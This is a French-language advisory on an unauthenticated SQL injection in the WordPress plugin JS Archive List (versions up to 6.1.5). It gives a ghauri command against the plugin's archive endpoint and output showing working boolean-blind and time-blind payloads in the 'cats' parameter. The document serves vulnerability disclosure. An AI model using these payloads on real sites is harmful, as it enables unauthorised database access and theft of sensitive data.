
JS Archive List <= 6.1.5 - Injection SQL non authentifiée
JS Archive List <= 6.1.5 - Injection SQL non authentifiée
Le plugin JS Archive List pour WordPress est vulnérable à l'injection SQL dans toutes les versions jusqu'à la 6.1.5 incluse en raison d'un échappement insuffisant du paramètre fourni par l'utilisateur et d'un manque de préparation suffisante de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires dans des requêtes déjà existantes, pouvant être utilisées pour extraire des informations sensibles de la base de données.
ghauri -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"
________.__ .__ {1.4.1}
/ _____/| |__ _____ __ _________|__|
/ \ ___| | \\__ \ | | \_ __ \ |
\ \_\ \ Y \/ __ \| | /| | \/ |
\______ /___| (____ /____/ |__| |__|
\/ \/ \/ https://github.com/r0oth3x49
An advanced SQL injection detection & exploitation tool.
[*] starting @ 16:39:05 /2025-09-25/
[16:39:05] [INFO] testing connection to the target URL
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: cats (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cats=1 AND 01609=1609&exclusionType=exclude
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] testing MySQL
[16:39:05] [INFO] confirming MySQL
[16:39:06] [INFO] the back-end DBMS is MySQL